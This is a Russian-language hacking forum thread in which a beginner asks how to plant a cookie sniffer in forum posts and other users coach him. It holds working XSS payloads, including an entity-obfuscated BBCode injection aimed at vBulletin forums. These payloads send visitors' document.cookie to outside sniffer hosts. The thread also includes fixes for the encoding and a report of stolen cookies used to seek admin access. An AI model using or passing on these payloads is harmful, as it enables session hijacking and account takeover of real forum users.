Скажите пожалуста как код снифера встовлять в тему...... Вот например код Code: <script>img=new Image(); img.src="http://s.netsec.ru//s.gif?id=591&"+document.cookie;</script> и все или что то надо менять в этом коде ??? Ответти мне на этот вопрос пожалуста..Я со снифером первый раз роботаю !
В какую тему и какого форума ты это вставлять собрался? Адрес твоего сниффера нужно вставлять в Код Xss специальный для твоей версии форума. А ЭТО просто пример того, как можно украсть куки, но долеко не та конструкция с помощью которой это надо делать=)) Скажи что за форум?
HTML: [URL=wj[url]http://www.][FONT=Arial style=display&+#58;none; style=background&+#58;&+#117;&+#114;&+#108;&+#40;&+#106;&+#97;&+#118;&+#97;&+#115;&+#99;&+#114;&+#105;&+#112;&+#116;&+#58;&+#100;&+#111;&+#99;&+#117;&+#109;&+#101;&+#110;&+#116;&+#46;&+#105;&+#109;&+#97;&+#103;&+#101;&+#115;&+#91;&+#49;&+#93;&+#46;&+#115;&+#114;&+#99;&+#61;&+#34;&+#104;&+#116;&+#116;&+#112;&+#58;&+#47;&+#47;&+#97;&+#110;&+#116;&+#105;&+#99;&+#104;&+#97;&+#116;&+#46;&+#114;&+#117;&+#47;&+#99;&+#103;&+#105;&+#45;&+#98;&+#105;&+#110;&+#47;&+#115;&+#46;&+#106;&+#112;&+#103;&+#63;&+#34;+document.cookie;&+#41;&+#32; / ]wj [/url][/FONT][/URL] Вот попробуй. Только удали плюсы из спец. символов, чтобы работало. Закодирован пол сниффер античата.
*************************** PHP: [URL=wj[url]http://www.][FONT=Arial style=display:none; style=background:url(javascript:document.&+#105;m&+#97;ges[1].src="http:/&47;antichat&+#46;ru/cgi-&+#98;in/s.jpg?"+document.cookie;) / ]wj [/url][/FONT][/URL] *********************************** Вот-так ??Я плюсы убрал...если нетак плиз розкажи как надо я просто хочю попробывать на зуб XSS
Мне что, за тебя плюсики уберать? И ГДЕ Ж ТЫ ПЛЮСЫ-ТО убрал???? Я сказал плюсы убрать только в спец. символах! Пример. Было &+#58, а становится просто :, понятно??? Я не знаю, как ещё проще объяснить.... Не забываем про репутацию
cardons А причем тут тема XSS на Bulletin 3.5.0??? НЕ флейми!=) зы qBiN уже отвечал на ЭТОТ твой вопрос в другой теме.
Вот посмотри теперь правильно ? Code: [URL=wj[url]http://www.][FONT=Arial style=display:none; style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;) ]wj[/url][/FONT][/URL]
Вместо ссылки на ачатовский сниффер впиши ссылку к твоему. Вида _http://s.netsec.ru//s.gif?id=[ID]& зы и всё-таки ещё не все плюсы ты убрал-)
Воще где то было в нете но я просрал страницу. Потом нашёл прогу URICrypt классная штука ищи в нете если что.
Стырил куки с Bulletin 3.0.7 А в админку попасть не могу! Пишет типа введите логин и пароль... Как добыть то это мокрое дело?
